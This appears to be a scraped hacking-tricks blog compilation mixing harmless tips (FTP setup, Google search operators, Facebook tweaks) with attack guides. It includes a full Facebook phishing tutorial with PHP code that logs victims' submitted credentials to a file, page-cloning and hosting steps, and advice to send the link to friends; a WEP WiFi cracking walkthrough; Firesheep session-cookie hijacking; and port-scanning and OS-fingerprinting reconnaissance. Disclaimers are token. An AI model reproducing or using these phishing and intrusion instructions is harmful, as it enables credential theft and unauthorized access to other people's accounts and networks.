Process-1:
First of all u have to get an static IP-Address.
Need a a static ip-address for ur FTP Server.Necessity for getting
this static ip-address is ur not suppose to use ur own IP-Address.The
main reason is u dont want to show ur IP-Address to everyone , there
are many other reasons too but leave them aside..
1) Goto no-ip & create urself a free account.
2) Now ur account been created & ll receive
ur account password via mail to ur email address.
3) After getting ur password login to ur account
of no-ip.com
4.After getting logged in, click upon add a HOST its on the left
menu.
5) Type any hostname u want (eg:-abc) & select
any domain from da given list (eg:-ftpserve.com) Click on Submit.
6) Now u have owned ur own static address (example:
abc.serveftp.com)
7) Now click downloads button which is present
above on the page & click on which operating system ur using
& den download DNS update client or u can download it from here
directly, this is for microsoft window users..
8) After getting downloaded, u have to install
this software & login here with ur email addresss & p/w
wen asked for it.
9) At last tick on da check box present at the
static address.
10) U have ur own static web address.
Process-2:
Installation & setting of the FTP-Server
1) You have to install Serv-U 4.1.03 , download
this software from here
2) Run Serv-U & use da wizard to setup ur
FTP.
3) Click on next until u have been asked for IP-Address,
leave it as it is & click upon next.
4) Enter ur domain name u have registered (example:
abc.serveftp.com) it above in da domain field & click upon next.
5) U ll be asked for anonymous access, select
No & click upon next.
6) Next u ll be asked for creating a named account,
select yes & click upon next.
7) Choose any user name u wish (eg:-xyz) &
clcik upon next.
8) Enter password for dis account (eg:-adc341)
for security purpose choose difficult password.
9) U ll be asked for da home directory for the
account which u have created above.Select directory & click
upon next.
10) Click on yes for locking dis account to da
home directory, doing dis da user cannot further move up into home
directory, click upon next.
11) At last ur account has been created click
finish.
Process-3:
Configuring the user accounts which u have been created.
1) On the left tree-menu, select da account which
u have been created above & den click upon General Tab.
2) Goto Hide 'Hidden' Files.
3) Check Allow only and enter the number one in
the box.
4) Set da maximum downloading speed upto wat extent
u want.As this is an account so many ll be using so set it low(eg:-10-20)
to save ur bandwidth.Don't leave it blank as uers can download with
full bandwidth.
5) choose how many users u want to login at on
time.It depends on ur connection speed try these (56 - 1, ISDN -
3, ADSL or cable - 5-6 users.)
6) Click upon Dir Access Tab.
7) Now u can c home folder here.Highlight it &
make ur permission.
8) If u want only users to download check only
these Read,List & Inherit.
9) If u want ur users to upload into ur server
& bu tto only 1 particular folder but not to downlaod, click
upon dat add button & then select dat folder, Now u have to
highlight dat folder & set these permissions on dat folder.Check,Write,Appened,List,Create
& Inherit after setting these permissions click on the arrow
which is present at the bottom right-hand corner.U want dis upload
folder 2 be list first, before da home folder.
10) If der is any folder which u dont want anyone
to access it, & it is present in the home folder, den click
da add button & den select da folder.Now u have to highlight
dat folder & see dat no all da checkboxes are left.After doing
this click upon upper arrow which is present at bottom right hand
corner.
11) There are many things u can do, These are
only the basics....
12) Your server is now ready to be connected..
13) Login with your username & password...
-: Chat with Friends through ms dos Command Prompt :-
1) All you need is your friend's IP Address and your Command Prompt.
2) Open Notepad and write this code as it is.....!
@echo off
:A
Cls
echo MESSENGER
set /p n=User:
set /p m=Message:
net send %n% %m%
Pause
Goto A
3) Now save this as "Messenger.Bat".
4) Open Command Prompt.
5) Drag this file (.bat file) over to Command Prompt and press Enter.
6) You would then see something like this:
7) Now, type the IP Address of the computer you want to contact and press enter
You will see something like this:
8) Now all you need to do is type your message and press Enter.
Start Chatting.......!
How To: Reveal Password Using a Javascript | Must try it once
If you want to reveal the password hidden behind the asterisk (*****), then you can see it with the help of javascript code.
Yeah! It is true! 
Just Follow the following steps:
Open the Login Page of any website. (eg. http://mail.yahoo.com)
Type your ‘Username’ and ‘Password’.
Copy and paste the JavaScript code given below into your browser’s address bar and press ‘Enter’.
javascript: alert(document.getElementById(‘Passwd’).value);
javascript: alert(document.getElementById(‘Passwd’).value);
As soon as you press ‘Enter’, A window pops up showing Password typed by you..!
Isn’t that simple ?
Do comment if you liked it.
Basic skills that you must have to be a good web developer
There
are many important skills that you should be constantly developing if
you want to become a successful web developer. You must be looking for
improvement and should also try and be continually learning. This is so,
because web development encompasses a wide variety of skills.
A few skills that you should have in you if you want to become a good web developer are as follows.
1. Basic knowledge
of SEO:
As a web developer you must have a good knowledge of basic SEO or
search engine optimization. You must have some strategies that target
those keywords on the page that are most searched by your clients. For
this you should have a clean mark up in the front end and should also
have a solid link and directory structure on the back end.
2. Knowing a good java script language:
It is very important for you to know a good JavaScript language. If you
learn a java script library, then the time you take to develop a java
script is reduced by half. You can start with animating and stop feature
checking as these libraries take out the cross-browser guess-work from
the JavaScript programming. They also provide many animation options
that are very easy.
3. Strong knowledge of image processing:
It is very important for web developers to have a good knowledge of
Photoshop. You should not always rely on professional designers and a
good knowledge of image processing also helps you to make quick last
minute changes without taking help from the professional designers.
Another advantage of this is that you will be able to make out what is
possible and what is not when you ask for design changes. You should
develop the skill of image optimization.
4. Good command over cyber law basics:
If you want to be a good web developer, then it is essential that you
have at least a good grasp over the basics of cyber law and copyright.
You should know that web sites are fundamentally publications. Thus, the
most common legal issues related to websites are usually issues related
to copyright. So it is important for you to have an adequate knowledge
of when you can get sued and when you can sue. It is also important for
you to read thoroughly and understand well any agreements that you have
with hosting companies or clients or with registrars. You should also
understand various privacy policies.
Sitemeter Hack- How to Hide Visual Tracker(counter)
Sitemeter
is an analytics tool that features custom counters styles. Site Meter
creates dynamic 3D charts of your traffic showing visitors, page views,
country maps, visit durations and much more!
But these counters are visible to everybody.
Only Premium Members can avail Invisible counters.
So I am going to present you a trick through which you can hide your visual tracker and enjoy the benefits
Its just few setting changes which will work fine.
- Login into your sitemeter account.
- Go to ‘Manager’ from top menu.
- Now Go to ‘Meter Style’ option from left hand menu.
- Select 2nd last meter style (Counter, which shows simple numbers).
- Now in “DIGIT COLOR” select ‘Transparent’, Similarly in “BACKGROUND COLOR” select ‘Transparent’.
- DONE.
You’re done! Give it a try !
Watching Videos That Require Log In or SIGNUP without signing up
Today I am going to share a very useful and time saving trick for using YouTube.
That is “How to watch YouTube videos which Requires Login and Sign up“.
I am a hardcore user of youtube and most of times get this error that to watch this video you have to login or signup.
So Today i am going to reveal the hack that How to watch YouTube videos without any registration or login
Watching Videos That Require Log In or SIGNUP
Stepwise Description:
1. Suppose there is a video. Example as
http://ww.youtube.com/watch?v=Q4WnNo4VE1I
2. Goto the above Url in New Window . You will see the following Window
3. Now you have seen clearly that above video requires LOGIN or SIGNUP.
Now We want to bypass that LOGIN or SIGNUP ERROR.
4. So Do the Following as Shown in FIGURE:
5. EDIT URL AS SHOW ABOVE that is replace the ? and = both by separate / and open the URL:
http://ww.youtube.com/watch/v/Q4WnNo4VE1I
6. That’s the End and You will be able to see video without LOGIN or SIGN UP.
THIS END’s THE TUTORIAL . I THINK THAT YOU HAVE SURELY LIKE IT
Access Facebook Chat Through Your Desktop
No
need to go to Facebook.com if all you want to do is use Facebook chat.
You can do it right from your desktop using clients like
Automatically Poke Friends That Poke You
Don’t have enough time to poke back friends who poke you on Facebook? Automate it with
How to Disable Facebook Timeline
Steps for
- Before Opening the Chrome browser Right click on the chrome icon and choose Properties.
- Now Look for the Target box and add the following code after 'chrome.exe'. (leave space after chrome.exe) --user-agent="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)"
- Now click 'Apply' and then 'ok'.
- Restart Chrome.
- Now open your facebook and you will see your old Profile back.
"if you want your timeline
account again then right click on chrome before opening - goto
properties, look for the target box and remove the code after
chrome.exe, click apply then ok."
Steps for Mozzila Firefox Users:
- First open your Firefox Browser and goto TOOLS then Go to Add-ons.
- Now you will found Add-on settings and then search "User Agent Switcher" in top search bar.
- Install this Add-on(user agent switcher).
- Now restart your Firefox Browser then go to TOOLS..
- Now click on Default User Agent Switcher Button and then select Internet Explorer 7.
- Now Login to Facebook and you will see your old profile back.
"If you again want your facebook timeline account simply goto TOOLS, click add-ons,set user agent switcher=disable."
You can also try this Method : ( Its old method but you can try it..)
1. Deactivate ur Account for an hour. (Warning: Don't delete account just deactivate it)
2. Don't login for an hour or 2
3. Login back and see profile..
How to Remove Annoying Facebook Ads From Your Facebook Profile ?
Hi all users, as title
describes the story that today we're going to learn how to remove
sponsor ads or ads from your facbook profile. As you know that facebook
is most a popular social networking website out there, but
unfortunately their main concern is money, so as
long as they’re making money they’re fine with their ads, for the most
part. Obviously if you accept advertisements from everyone and anyone
you’ll get spammy ads from time to time, it’s impossible for Facebook
to police every advertisement, no matter how many resources they have.
To find out how to remove ads from Facebook, let's get started.
Follow The Steps Below to Remove Your Facebook Ads :
1. First
of all you will need to be using either Firefox or Google Chrome as
your web browser. Both are the worlds quickest and best browsers, you
should be using one of them if you aren’t already. Here we consider
both of them.
2. To remove ads from Facebook, the first thing you should do is
install Adblock Plus. Here we want to mention that when you download
Chrome that it comes with an extension called Adblock, make sure you
download Adblock Plus for Chrome, they’re completely different. If you’re using Firefox, download Adblock Plus for Firefox.
How To Remove Ads From Facebook And Other Sites
That’s it, that is how to remove ads from Facebook. Adblcok Plus for
Firefox and Chrome is already set up to block ads from Facebook, so we
needn’t do anything else. If you’re serious about removing ads from
every site though, you can check out NoScript as
well. When someone who places ads on their sites wants to stop
ad-blockers from preventing ads being displayed, they try to hide the
ads in a script. You can block these as well by using NoScript for Chrome, or NoScript for Firefox. Adblock Plus and NoScript work hand in hand a blocking anything from Java Script to Flash.
If you do eventually see ads on Facebook, then you may need to update
the filters. To do so, simply go to Tools, then Adblock Plus
Preferences, click Filters, then click Update All Subscriptions, then
click Apply then OK.
Enjoy.......
Trick to Post Empty Status or Comment on Facebook
Yes this is the Trick as it is not possible to Post an Empty Status or Comment on Facebook.
So to use this Trick just follow these simple steps :
1) Login to your Facebook Account.
2) Now go to Status Update or the Comment field.
3) Now just Press and keep holding Alt key and type 0173 .
4) Now release the Alt Key and Click on Post to Share your Empty Status.
5) Now it is done. Your Empty Status or Comment has been Posted on Facebook.
20 Great Google Secrets
20 Great Google Secrets
Google is clearly the best general-purpose search engine on the Web
But most people don't use it to its best advantage. Do you just plug in a
keyword or two and hope for the best? That may be the quickest way to
search, but with more than 3 billion pages in Google's index, it's still
a struggle to pare results to a manageable number.
But Google is an remarkably powerful tool that can ease and enhance your
Internet exploration. Google's search options go beyond simple
keywords, the Web, and even its own programmers. Let's look at some of
Google's lesser-known options.
Syntax Search Tricks
Using a special syntax is a way to tell Google that you want to restrict
your searches to certain elements or characteristics of Web pages.
Google has a fairly complete list of its syntax elements at
. Here are some advanced operators that can help narrow down your search results.
Intitle: at the beginning of a query word or phrase (intitle:"Three
Blind Mice") restricts your search results to just the titles of Web
pages.
Intext: does the opposite of intitle:, searching only the body text,
ignoring titles, links, and so forth. Intext: is perfect when what
you're searching for might commonly appear in URLs. If you're looking
for the term HTML, for example, and you don't want to get results such
as
www.mysite.com/index.html
, you can enter intext:html.
Link: lets you see which pages are linking to your Web page or to another page you're interested in. For example, try typing in
link:http://www.pcmag.com
Try using site: (which restricts results to top-level domains) with
intitle: to find certain types of pages. For example, get scholarly
pages about Mark Twain by searching for intitle:"Mark Twain"site:edu.
Experiment with mixing various elements; you'll develop several
strategies for finding the stuff you want more effectively. The site:
command is very helpful as an alternative to the mediocre search engines
built into many sites.
Swiss Army Google
Google has a number of services that can help you accomplish tasks you
may never have thought to use Google for. For example, the new
calculator feature
lets you do both math and a variety of conversions from the search box.
For extra fun, try the query "Answer to life the universe and
everything."
Let Google help you figure out whether you've got the right spelling—and
the right word—for your search. Enter a misspelled word or phrase into
the query box (try "thre blund mise") and Google may suggest a proper
spelling. This doesn't always succeed; it works best when the word
you're searching for can be found in a dictionary. Once you search for a
properly spelled word, look at the results page, which repeats your
query. (If you're searching for "three blind mice," underneath the
search window will appear a statement such as Searched the web for
"three blind mice.") You'll discover that you can click on each word in
your search phrase and get a definition from a dictionary.
Suppose you want to contact someone and don't have his phone number
handy. Google can help you with that, too. Just enter a name, city, and
state. (The city is optional, but you must enter a state.) If a phone
number matches the listing, you'll see it at the top of the search
results along with a map link to the address. If you'd rather restrict
your results, use rphonebook: for residential listings or bphonebook:
for business listings. If you'd rather use a search form for business
phone listings, try Yellow Search
Extended Googling
Google offers several services that give you a head start in focusing your search. Google Groups
indexes literally millions of messages from decades of discussion on
Usenet. Google even helps you with your shopping via two tools: Froogle
CODE
which indexes products from online stores, and Google Catalogs
CODE
which features products from more 6,000 paper catalogs in a searchable
index. And this only scratches the surface. You can get a complete list
of Google's tools and services at
You're probably used to using Google in your browser. But have you ever thought of using Google outside your browser?
Google Alert
monitors your search terms and e-mails you information about new
additions to Google's Web index. (Google Alert is not affiliated with
Google; it uses Google's Web services API to perform its searches.) If
you're more interested in news stories than general Web content, check
out the beta version of Google News Alerts
This service (which is affiliated with Google) will monitor up to 50
news queries per e-mail address and send you information about news
stories that match your query. (Hint: Use the intitle: and source:
syntax elements with Google News to limit the number of alerts you get.)
Google on the telephone? Yup. This service is brought to you by the folks at Google Labs
a place for experimental Google ideas and features (which may come and
go, so what's there at this writing might not be there when you decide
to check it out). With Google Voice Search
you dial the Voice Search phone number, speak your keywords, and then
click on the indicated link. Every time you say a new search term, the
results page will refresh with your new query (you must have JavaScript
enabled for this to work). Remember, this service is still in an
experimental phase, so don't expect 100 percent success.
In 2002, Google released the Google API (application programming
interface), a way for programmers to access Google's search engine
results without violating the Google Terms of Service. A lot of people
have created useful (and occasionally not-so-useful but interesting)
applications not available from Google itself, such as Google Alert. For
many applications, you'll need an API key, which is available free from
CODE
. See the figures for two more examples, and visit
for more.
Thanks to its many different search properties, Google goes far beyond a
regular search engine. Give the tricks in this article a try. You'll be
amazed at how many different ways Google can improve your Internet
searching.
Online Extra: More Google Tips
Here are a few more clever ways to tweak your Google searches.
Search Within a Timeframe
Daterange: (start date–end date). You can restrict your searches to
pages that were indexed within a certain time period. Daterange:
searches by when Google indexed a page, not when the page itself was
created. This operator can help you ensure that results will have fresh
content (by using recent dates), or you can use it to avoid a topic's
current-news blizzard and concentrate only on older results. Daterange:
is actually more useful if you go elsewhere to take advantage of it,
because daterange: requires Julian dates, not standard Gregorian dates.
You can find converters on the Web (such as
CODE
excl.gif No Active Links, Read the Rules - Edit by Ninja excl.gif
), but an easier way is to do a Google daterange: search by filling in a form at
. If one special syntax element is good, two must be better, right?
Sometimes. Though some operators can't be mixed (you can't use the link:
operator with anything else) many can be, quickly narrowing your
results to a less overwhelming number.
More Google API Applications
Staggernation.com offers three tools based on the Google API. The Google
API Web Search by Host (GAWSH) lists the Web hosts of the results for a
given query
When you click on the triangle next to each host, you get a list of
results for that host. The Google API Relation Browsing Outliner (GARBO)
is a little more complicated: You enter a URL and choose whether you
want pages that related to the URL or linked to the URL
Click on the triangle next to an URL to get a list of pages linked or
related to that particular URL. CapeMail is an e-mail search application
that allows you to send an e-mail to google@capeclear.com with the text
of your query in the subject line and get the first ten results for
that query back. Maybe it's not something you'd do every day, but if
your cell phone does e-mail and doesn't do Web browsing, this is a very
handy address to know.
Firesheep:Trick to Hack Facebook and Twitter Password on Wifi
So,
the trick I am telling you works only on websites like
facebook,twiiter,flickr but not on secured websites like Gmail.So here
is Trick to Hack Facebook and Twitter Password on Wifi
and also the method of protection from
this hack.This trick doesnot require any programming knowlege and
everyone can use this trick easily.
1.Download firesheep Firefox extension.This is a freeware extension for firefox browser.
2. Once installed it will open a sidebar window into your firefox browser.
3.Now
it will show all the people who are connected to unsecured wifi
network.Once they login into your facebook or twitter account you will
get a notification and with a single click you can login into their
account.
This whole thing work on the technique of cookie hijacking.Once your
session cookie is hacked then anybody can login into your account.These
cookies can be easily caputered on unsecured wifi network.
The best way to protect yourself from such a hacking trick is to avoid
using your facebook or twitter accounts on unsecured wifi networks as
it is a security lapse from the websites not on your side.
Note:-This article is to inform you about how your
password can be hacked and how to prevent it.This article is purely for
educational purposes.
Hack/Crack a WiFi Network
Hi all users I think many Windows
users here are struggling to hack WiFi networks because most of the
tutorials are based on BackTrack and other Linux Tools . So today I'm
here for sharing a method to Crack WiFi networks using WEP security
protocol .The WEP is a very vuarable to attacks and can be cracked
easily .
It takes about 5-6 hours if the password is weak a high signal of the
WiFi network you are going to hack and you have sometimes 10-12 for more
complicated passwords and if the WiFi signal of the Network is weak
.The time taken also changes if the WiFi network you are going to hack
has many other clients already accessing it .
You will be using two tools :
1. Commview for WiFi :
You will use this tool for capturing the packets sent and recieved
through the Access Point you are going to hack .The more packets you
capture the better chances of cracking the password .You will need more
than 1,00,000 minium packets to crack the password .The packets will
be captured in the .ncp format .You will use this tool to convert the
.ncp to .cap .
Note :- Some
WiFi cards are supported by Commview only in Windows 7 so i suggest
you install Win 7 in your Virtual Machine if your card isn't supported .
2. Aircrack-Ng GUI : You
will use this tool to crack the password of the Access Point using the
. Cap files you obtained from the Commview application .
Note :- You need to run this as administrator .
Now Get Ready to Crack :
Step 1 : Install
CommView for WiFi . It doesnt matter whether you install it in VoIP
mode or Standard mode . I used VoIP . It automatically installs the
necessary drivers . Allow it to install .
Note :- You will not be able to connect to any Network using WiFi when using CommView .
Step 2 : Click on the PLAY ICON in the Left First .
Step 3 : (Choosing the Network (a) ) : A new window should pop up now. Click on the START SCANNING button .
Step 4 : (Choosing the Network (b) ) : Click on the WiFi network you want to hack in the Right Coulumn and Click on CAPTURE.
Note :- This tutorial is only for WEP protected networks .
Step 5 : (Capturing the Packets) : The windows should close now and you should see that CommView has started Capturing Packets .
Step 6 : (Saving
the Packets ) : Now that the Packets are getting captured you need to
Save them. Click on Settings->Options->Memory Usage Change
Maximum Packets in buffer to 20000.
Click on the LOGGING Tab .
Check AUTO-SAVING
In the Maximum Directory Size : 5000
Average Log File Size : 50
Now CommView will automatically Start Saving packets in the .ncp format at a size of 20MB each in the specified directory .
Step 7 : (
Concatenating the Logs ) : Since you are capturing a lot of logs you
will need to concatenate them into once file . To do this go to Logging
and click on CONCATENATE LOGS Choose all the files that have been
saved in your specified folder and Concatenate them .
Now you will have one .ncf file .
Step 8 :
(Converting .ncf to .cap ) : Now that you have one file with all the
packets you need to Convert it into .cap file for AIRCRACK to crack .
Click on File->Log Viewer->Load Commview Logs-> Choose the .ncf
file. Now File->Export->Wireshark/TCP dump format .
Aircrack Part :
Now for the Second Part Cracking this is very simple . Just open the
Aircrack Folder->Bin->Aircrack-ng GUI.exe Choose the .cap file and
you should be able to do the others .
If you have any questions or having problems post a thread il reply .
This is a simple tutorial . There is more advance using the rules and
stuff but I havnt used it yet . This worked for me . Hope you found it
useful . Took a lot of time . Please leave your feedback.
Hack Facebook Chat History
There
is a simpe easy Trick to Hack Facebook Chat History. We can Hack Chat
History even if our Friends are Offline. To use this Trick follow the
simple steps given below :
1) Open Friends profile.
2) Right Click on the Poke and Select Copy Link Location. Now we have the ID in our Clipboard.
3) This will exactly look like :
( where XYX can be any numbers and this XYZ is nothing but the ID ).
4) Now in the Address Bar type "javascript:Chat.openTab(XYZ)" (without qoutes) and press Enter.
5) Now it is done.
6) You can see full Chat History now.
So this is a simple Trick to Hack Facebook Chat History.
-: Network Hacking :-
Network Hacking is generally means gathering information
about domain by using tools like Telnet, NslookUp, Ping, Tracert, Netstat,
etc.
It also includes OS Fingerprinting, Port Scaning and Port Surfing
using various tools.
Ping :- Ping is part
of ICMP (Internet Control Message Protocol) which is used to troubleshoot
TCP/IP networks. So, Ping is basically a command that allows you to check
whether the host is alive or not.
To ping a particular host the syntax is (at command prompt)--
c:/>ping hostname.com
example:- c:/>ping www.google.com
Various attributes used with 'Ping' command and their usage can be
viewed by just typing c:/>ping at the command prompt.
Netstat :- It displays protocol statistics
and current TCP/IP network connections. i.e. local address, remote address,
port number, etc.
It's syntax is (at command prompt)--
c:/>netstat -n
Telnet :- Telnet is a program which
runs on TCP/IP. Using it we can connect to the remote computer on particular
port. When connected it grabs the daemon running on that port.
The basic syntax of Telnet is (at command prompt)--
c:/>telnet hostname.com
By default telnet connects to port 23 of remote computer.
So, the complete syntax is-
c:/>telnet www.hostname.com port
example:- c:/>telnet www.yahoo.com 21 or c:/>telnet 192.168.0.5 21
Tracert :- It is used to trace out
the route taken by the certain information i.e. data packets from source
to destination.
It's syntax is (at command prompt)--
c:/>tracert www.hostname.com
example:- c:/>tracert www.insecure.in
Here "* * * Request
timed out." indicates that firewall installed on that system block the request
and hence we can't obtain it's IP address.
various attributes used with tracert command and their usage can be viewed
by just typing c:/>tracert at the command prompt.
The information obtained by using tracert command can be further used to
find out exact operating system running on target system.
-: Network Hacking (Port Scanning) :-
Port Scanning :-
Port scanning is carried out to determine a list of open ports on
the remote host that have certain services or daemons running. In
port scanning, the attacker connects to various TCP and UDP ports
and tries to determine which ports are in listening mode.
1) TCP Ports Scanning :- Almost all port
scans are based on the client sending a packet containing a particular
flag to the target port of the remote system to determine whether
the port is open. Following table lists the type of flags a TCP packet
header can contain.
| Flag | Meaning |
|---|---|
| URG (urgent) | This flag tells the receiver that the data pointed at by the urgent pointer required urgently. |
| ACK (acknowledgment) | This flag is turned on whenever sender wants to acknowledge the receipt of all data send by the receiving end. |
| PSH (push) | The data must be passed on to the application as soon as possible. |
| RST (reset) | There has been a problem with the connection and one wants to reset the connection with another. |
| SYN (synchronize) | If system X wants to establish TCP connection with system Y, then it sends it's own sequence number to Y, requesting that a connection be established. Such apacket is known as synchronize sequence numbers or SYN packet. |
| FIN (finish) | If system X has finished sending all data packets and wants to end the TCP/IP connection that it has established with Y, then it sends a packet with a FIN flag to system Y. |
A typical TCP/IP three way handshake can be described as follows :
1) The client sends a SYN packet to the server.
2) The server replies with a SYN packet and acknowledges the client's
SYN packet by sending an ACK packet.
3) The client acknowledges the SYN sent by the server.
Different techniques of TCP port scanning are :-
1) TCP connect port scanning
2) TCP SYN scanning (half open scanning)
3) SYN/ACK scanning
4) TCP FIN scanning
5) TCP NULL scanning
6) TCP Xmas tree scanning
2) UDP Ports Scanning :- In UDP port
scanning, aUDP packet is sent to each port on the target host one
by one.
If the remote port is closed, then the server replies with a Port
Unreachable ICMP error message. If the port is open then no such error
message is generated.
3) FTP Bounce Port Scanning :- The FTP
bounce port scanning technique was discovered by Hobbit. He revealed
a very interesting loophole in the FTP protocol that allowed users
connected to the FTP service of a particular system to connect to
any port of another system. This loophole allows anonymous port scanning.
Recommended
Tools
|
|
Nmap
|
http://www.insecure.org/nmap
|
Superscan
|
http://www.foundstone.com
|
-: Network Hacking (OS Fingerprinting) :-
OS Fingerprinting :-
OS Fingerprinting refers to detection of target computer's operating system.
Since, different operating system responds differently to the same
kind of ICMP message, it is very important for an attacker to determine
the exact operating system running on target system.
Also attacker can carry out attacks by taking over the vulnerabilities/bugs
found in that particular operating system.
There are four areas that we will look at to determine the operating
system (however there are other signatures that can be used). These
signatures are:
1) TTL - What the operating system sets the Time
To Live on the outbound packet.
2) Window Size - What the operating system sets the
Window Size at.
3) DF - Does the operating system set the Don't Fragment
bit.
4) TOS - Does the operating system set the Type of
Service, and if so, at what.
There are two different types of OS Fingerprinting technique -
1) Active OS Fingerprinting :- Remote
active operating system fingerprinting is the process of actively
determining a targeted network node’s underlying operating system
by probing the
targeted system with several packets and examining the response(s),
or lack thereof, received? The traditional approach is to examine
the TCP/IP stack behavior (IP, TCP, UDP, and ICMP protocols) of a
targeted network element when probed with several legitimate and/or
malformed packets.
| Recommended Tools | |
|---|---|
| Nmap | http://insecure.org/nmap |
2) Passive OS Fingerprinting :-Passive fingerprinting is
based on sniffer traces from the remote system. Instead of actively
querying the remote system, all you need to do is capture packets
sent from the remote system. Based on the sniffer traces of these
packets, you can determine the operating system of the remote host.
Just like in active fingerprinting, passive fingerprinting is
based on the principle that every operating system's IP stack has
its own idiosyncrasies. By analyzing sniffer traces and identifying
these differences, you may be able determine the operating system
of the remote host.
| Recommended Tools | |
|---|---|
| P0f | http://lcamtuf.coredump.cx/p0f.shtml |
| Ettercap | http://ettercap.sourceforge.ne |
How to create facebook fake login page "Phishing Tutorial"
Note: Hacking is a crime. Dont use this tutorial to hack innocent people. I am teaching it for educational purpose only. I will not be responsible for any damage done by you.
well, here we go for creating Fake page of Facebook...
Here we will need 3 types of files for facebook:
1. A php file with any name say login.php. This php file places main role to get the passwords of victim
2. index.html which is a fake html page similar to original Page of Facebook.
3. Photos, CSS, js files
Step 1. Creating a login.php file>
Open notepad and paste the following lines there... as save it with name login.php
$handle = fopen("log.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
step 2. Create index.html Page:
2.1. first of all open login page of Facebook.com..... then right click there> save as/save page as> then save it....
check the downloaded file.... there will be
one htm file(Welcome to Facebook.htm)
A folder(Welcome to Facebook_files) containing some pics, css files and js files.(this folder contains 3rd type of files that i hv mentioned above.)
2.2. Now open the htm file with notepad(right click> open with> notepad)...
and then press ctrl +F and search for action... and you will find a line as shown in screenshot.
Note:in case of some other sites may be you find more then one action word... but you have to find out the exact type of line as shown in screen shot.... near which you will find a
tag and method="post" something like that.
2.3. Now replace the url written after action with the name of your php file created in step 1.
Now your fake page is ready....
Save it with name index.html
Step 3: Uploading on a Free Hosting Site:
Now you have to upload all the 3 mentioned files on a free hosting account. Here i m explaining file uploading onhttp://www.yourfreehosting.net/.
1. first of all sign up for a free hosting Account.
Note: yourfreehosting.net is now not available for free, you can create account on
2. After creating Account, login there, then go to control pannel> File Manager.
3. Now remove the preexisting index.html file.
4. Now click on upload files and then upload there index.html and login.php
5. Now click on New directory to make a new folder there and name it "Welcome to Facebook_files"
6. Now open the directory
"Welcome to Facebook_files"
and then upload all the files(css,js, photos) of folder Welcome to Facebook_files,which was downloaded with facebook page in step 2.
Now your phishing page is ready to hack ;)
7. Now give url of ur index page to ur friends, as soon as they will login through ur created fake page,a new log.txt file will be created and their password will be saved in that file.
No comments:
Post a Comment